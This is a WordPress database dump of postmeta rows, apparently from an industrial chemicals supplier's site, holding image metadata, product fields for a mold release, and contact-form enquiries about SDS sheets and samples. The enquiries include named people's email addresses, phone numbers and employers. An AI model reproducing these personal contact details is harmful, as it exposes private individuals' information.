INSERT INTO `wp_postmeta` VALUES (38410, 4340, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:668;s:4:"file";s:34:"2017/05/shutterstock_388748860.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_388748860-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_388748860-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_388748860-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_388748860-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_388748860-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_388748860-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_388748860-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38411, 4351, '_wp_attached_file', '2017/05/shutterstock_469809758.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38412, 4351, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_469809758.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_469809758-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_469809758-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_469809758-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_469809758-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_469809758-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_469809758-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_469809758-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38413, 4353, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38414, 4353, '_seq_num', '306'); 
INSERT INTO `wp_postmeta` VALUES (38415, 4353, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38416, 4353, '_field_12', 'Robert Collins'); 
INSERT INTO `wp_postmeta` VALUES (38417, 4353, '_field_13', 'Henryetta Glassman'); 
INSERT INTO `wp_postmeta` VALUES (38418, 4353, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (38419, 4353, '_field_14', 'Rc3.ipad@icloud.com'); 
INSERT INTO `wp_postmeta` VALUES (38420, 4353, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (38421, 4353, '_field_16', 'Hello,\r\n\r\nWe are looking for a release agent. We melt glass at two different temperatures, depending on what we are making.   Either 1550f or 1985f.  The glass is in stainless steel tubs. We have tried a product that uses powdered clay and alumna .  It doesn&#039;t work great. Looking for something better.  Do you have any recommendations? And, what is the cost? Do you have samples?'); 
INSERT INTO `wp_postmeta` VALUES (38422, 4353, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38423, 4353, '_sub_id', '4353'); 
INSERT INTO `wp_postmeta` VALUES (38424, 4354, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38425, 4354, '_seq_num', '685'); 
INSERT INTO `wp_postmeta` VALUES (38426, 4354, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38427, 4354, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38428, 4354, '_field_1', 'Boris Hagemann'); 
INSERT INTO `wp_postmeta` VALUES (38429, 4354, '_field_10', 'UTC Aerosapce Systems'); 
INSERT INTO `wp_postmeta` VALUES (38430, 4354, '_field_2', 'boris.hagemann@utas.utc.com'); 
INSERT INTO `wp_postmeta` VALUES (38431, 4354, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38432, 4354, '_field_3', 'Hello \nFor an Internal Process we require a MSDS (SDS) ofr MS-143X in German and English prepared to the REACH (Registration, Evaluation, Authorisation and Restriction of Chemicals)\nthis I presume you are familiar with. If possible would you be so kind and e mail me the MSDS (SDS) \n\nWith kind Regards \n\nBoris Hagemann   '); 
INSERT INTO `wp_postmeta` VALUES (38433, 4354, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38434, 4354, '_sub_id', '4354'); 
INSERT INTO `wp_postmeta` VALUES (38435, 4336, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (38436, 4359, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38437, 4359, '_seq_num', '686'); 
INSERT INTO `wp_postmeta` VALUES (38438, 4359, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38439, 4359, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38440, 4359, '_field_1', 'Jan Bartus, PhD'); 
INSERT INTO `wp_postmeta` VALUES (38441, 4359, '_field_10', 'Nanocomp Technologies, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (38442, 4359, '_field_2', 'jbartus@nanocomptech.com'); 
INSERT INTO `wp_postmeta` VALUES (38443, 4359, '_field_8', '(603) 689-2131'); 
INSERT INTO `wp_postmeta` VALUES (38444, 4359, '_field_3', 'Hi there,\r\n\r\nI am looking for samples of Epon 828 and Epikure 3300 for aerospace applications on our carbon nanotube materials. Do you have this combination available as a film for pre-preg please? If not, do you know if other company may have it as a film (similar to Gurit SA80)?\r\n\r\nThank you,\r\n\r\nJan Bartus, PhD'); 
INSERT INTO `wp_postmeta` VALUES (38445, 4359, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38446, 4359, '_sub_id', '4359'); 
INSERT INTO `wp_postmeta` VALUES (38447, 4360, '_wp_attached_file', '2017/05/shutterstock_507408157.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38448, 4360, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_507408157.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_507408157-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_507408157-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_507408157-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_507408157-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_507408157-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_507408157-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_507408157-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38449, 4361, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38450, 4361, '_seq_num', '687'); 
INSERT INTO `wp_postmeta` VALUES (38451, 4361, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38452, 4361, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38453, 4361, '_field_1', 'Jim Foreman'); 
INSERT INTO `wp_postmeta` VALUES (38454, 4361, '_field_10', 'Raytheon'); 
INSERT INTO `wp_postmeta` VALUES (38455, 4361, '_field_2', 'j-foreman1@raytheon.com'); 
INSERT INTO `wp_postmeta` VALUES (38456, 4361, '_field_8', '(972) 952-3713'); 
INSERT INTO `wp_postmeta` VALUES (38457, 4361, '_field_3', 'Currently using MS-143H for molding applications.  I see it has become obsolete.  What is the most suitable replacement material to obtain multiple release prior to reapplying?  Molding temperature is 288 degrees C (550 F).  Will need SDS for applicable product for approval by corporate EH&amp;S prior to procurement.  '); 
INSERT INTO `wp_postmeta` VALUES (38458, 4361, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38459, 4361, '_sub_id', '4361'); 
INSERT INTO `wp_postmeta` VALUES (38460, 4362, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38461, 4362, '_seq_num', '307'); 
INSERT INTO `wp_postmeta` VALUES (38462, 4362, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38463, 4362, '_field_12', 'Carr Rutherford'); 
INSERT INTO `wp_postmeta` VALUES (38464, 4362, '_field_13', 'Fisher Scientific'); 
INSERT INTO `wp_postmeta` VALUES (38465, 4362, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (38466, 4362, '_field_14', 'carr.rutherford@thermofisher.com'); 
INSERT INTO `wp_postmeta` VALUES (38467, 4362, '_field_15', '(905) 725-7341'); 
INSERT INTO `wp_postmeta` VALUES (38468, 4362, '_field_16', 'Require SDS for the following product for regulatory review purposes;\nMS122-XD  MOLD RELEASE\n\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (38469, 4362, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38470, 4362, '_sub_id', '4362'); 
INSERT INTO `wp_postmeta` VALUES (38471, 4366, '_wp_attached_file', '2017/05/shutterstock_505351012.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38472, 4366, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:813;s:4:"file";s:34:"2017/05/shutterstock_505351012.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_505351012-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_505351012-800x650.jpg";s:5:"width";i:800;s:6:"height";i:650;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_505351012-768x624.jpg";s:5:"width";i:768;s:6:"height";i:624;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_505351012-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_505351012-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_505351012-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_505351012-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38473, 4369, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38474, 4369, '_seq_num', '688'); 
INSERT INTO `wp_postmeta` VALUES (38475, 4369, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38476, 4369, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38477, 4369, '_field_1', 'Emily Curry'); 
INSERT INTO `wp_postmeta` VALUES (38478, 4369, '_field_10', 'Oklahoma Department of Agriculture, Food and Forestry'); 
INSERT INTO `wp_postmeta` VALUES (38479, 4369, '_field_2', 'emily.curry@ag.ok.gov'); 
INSERT INTO `wp_postmeta` VALUES (38480, 4369, '_field_8', '(405) 521-3510'); 
INSERT INTO `wp_postmeta` VALUES (38481, 4369, '_field_3', 'Could you please send me theSDS for MS-550N Cleaning solvent and Flux remover via email if possible?\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (38482, 4369, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38483, 4369, '_sub_id', '4369'); 
INSERT INTO `wp_postmeta` VALUES (38484, 4378, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38485, 4378, '_seq_num', '689'); 
INSERT INTO `wp_postmeta` VALUES (38486, 4378, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38487, 4378, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38488, 4378, '_field_1', 'Bingcan Chen'); 
INSERT INTO `wp_postmeta` VALUES (38489, 4378, '_field_10', 'North Dakota State University'); 
INSERT INTO `wp_postmeta` VALUES (38490, 4378, '_field_2', 'bingcan.chen@ndsu.edu'); 
INSERT INTO `wp_postmeta` VALUES (38491, 4378, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38492, 4378, '_field_3', 'May I request free sample of VAZO 52 (2-2′-Azobis(2,4-dimethylvaleronitrile)) for natural antioxidants research at NDSU?\r\nThanks,\r\nBingcan'); 
INSERT INTO `wp_postmeta` VALUES (38493, 4378, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38494, 4378, '_sub_id', '4378'); 
INSERT INTO `wp_postmeta` VALUES (38495, 4379, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38496, 4379, '_seq_num', '690'); 
INSERT INTO `wp_postmeta` VALUES (38497, 4379, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38498, 4379, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38499, 4379, '_field_1', 'Keimpe Oenema'); 
INSERT INTO `wp_postmeta` VALUES (38500, 4379, '_field_10', 'University of Groningen'); 
INSERT INTO `wp_postmeta` VALUES (38501, 4379, '_field_2', 'k.f.oenema@student.rug.nl'); 
INSERT INTO `wp_postmeta` VALUES (38502, 4379, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38503, 4379, '_field_3', 'Dear Miller-Stephenson,\n\nMy name is Keimpe Oenema, currently being a student Industrial Engineering &amp; Management at the University of Groningen, Holland. I&#039;m taking the course Surface Engineering &amp; Coating Technology, for which I have to write a review paper on conformal coating. Think of process description, types of conformal coating and their performance implications, background, costs implications and so on.\n\nScrolling on your page regarding conformal coatings, I wondered whether you could provide me  information that could be relevant for my review. I&#039;m searching for all kinds of information regarding conformal coating. Even if you cannot give any specific information, yet do have other tips or links, I&#039;m interested. I can send you my file after I have finished it, if it may be of your interest. \n\nThank you in advance, \nKeimpe Oenema\nUniversity of Groningen'); 
INSERT INTO `wp_postmeta` VALUES (38504, 4379, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38505, 4379, '_sub_id', '4379'); 
INSERT INTO `wp_postmeta` VALUES (38506, 4384, '_edit_lock', '1496326627:2'); 
INSERT INTO `wp_postmeta` VALUES (38507, 4384, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (38508, 4386, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38509, 4386, '_seq_num', '691'); 
INSERT INTO `wp_postmeta` VALUES (38510, 4386, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38511, 4386, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38512, 4386, '_field_1', 'dennis '); 
INSERT INTO `wp_postmeta` VALUES (38513, 4386, '_field_10', 'alutiiq'); 
INSERT INTO `wp_postmeta` VALUES (38514, 4386, '_field_2', 'dennis.harold44@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (38515, 4386, '_field_8', '(479) 650-8892'); 
INSERT INTO `wp_postmeta` VALUES (38516, 4386, '_field_3', 'can you  mix your  synthetic  grease  with  non synthetic  in ball joints '); 
INSERT INTO `wp_postmeta` VALUES (38517, 4386, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38518, 4386, '_sub_id', '4386'); 
INSERT INTO `wp_postmeta` VALUES (38519, 4387, '_wp_attached_file', '2017/06/shutterstock_318854045.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38520, 4387, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/06/shutterstock_318854045.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318854045-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_318854045-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_318854045-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318854045-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318854045-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_318854045-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_318854045-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38522, 4391, '_wp_attached_file', '2017/06/shutterstock_123579979.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38523, 4391, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:669;s:4:"file";s:34:"2017/06/shutterstock_123579979.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_123579979-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_123579979-800x535.jpg";s:5:"width";i:800;s:6:"height";i:535;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_123579979-768x514.jpg";s:5:"width";i:768;s:6:"height";i:514;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_123579979-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_123579979-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_123579979-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_123579979-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38525, 4401, '_edit_lock', '1496341298:2'); 
INSERT INTO `wp_postmeta` VALUES (38526, 4401, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (38527, 4402, '_edit_lock', '1498318836:3'); 
INSERT INTO `wp_postmeta` VALUES (38528, 4402, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (38531, 2050, '_oembed_508fec1cde1396f025869c71421fba2b', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/tbzqYPsuauI?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (38532, 2050, '_oembed_time_508fec1cde1396f025869c71421fba2b', '1496337431'); 
INSERT INTO `wp_postmeta` VALUES (38534, 4405, '_wp_attached_file', '2017/06/shutterstock_542631694.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38535, 4405, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/06/shutterstock_542631694.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_542631694-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_542631694-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_542631694-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_542631694-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_542631694-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_542631694-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_542631694-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38536, 4402, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (38537, 4402, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (38538, 4402, '_thumbnail_id', '4406'); 
INSERT INTO `wp_postmeta` VALUES (38539, 4402, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table width="385">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Crosslinking Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (38540, 4402, '716_default_editor', 'ReleaSys RM rotational mold release products should be applied via any method which can deliver fine atomization or via a microfiber cloth. Ideally the mold surface would be between 20°C (68°F) and 205°C (400°F). Spray application is recommended, although brushing or wiping may also be used. Optimum multiple release performance is obtained by applying to molds preheated above 60°C (140°F). The ease of release, number of releases/application and surface finish will depend on application technique, mold temperature and number of coats applied.\r\n<ul>\r\n 	<li>LLDPE, LDPE, MDPE, HDPE, XLPE,</li>\r\n 	<li>Polypropylene (PP)</li>\r\n 	<li>Nylon / Polyamide</li>\r\n 	<li>Polycarbonate.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (38541, 4402, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38542, 4402, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38543, 4402, '317_default_editor', '1 gallon, 5 gallon, 55 gallon, 275 tote'); 
INSERT INTO `wp_postmeta` VALUES (38544, 4402, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38545, 4402, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (38546, 4402, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38547, 4402, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38548, 4402, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38549, 4402, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (38550, 4402, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38551, 4402, '_virtual', 'no'); 
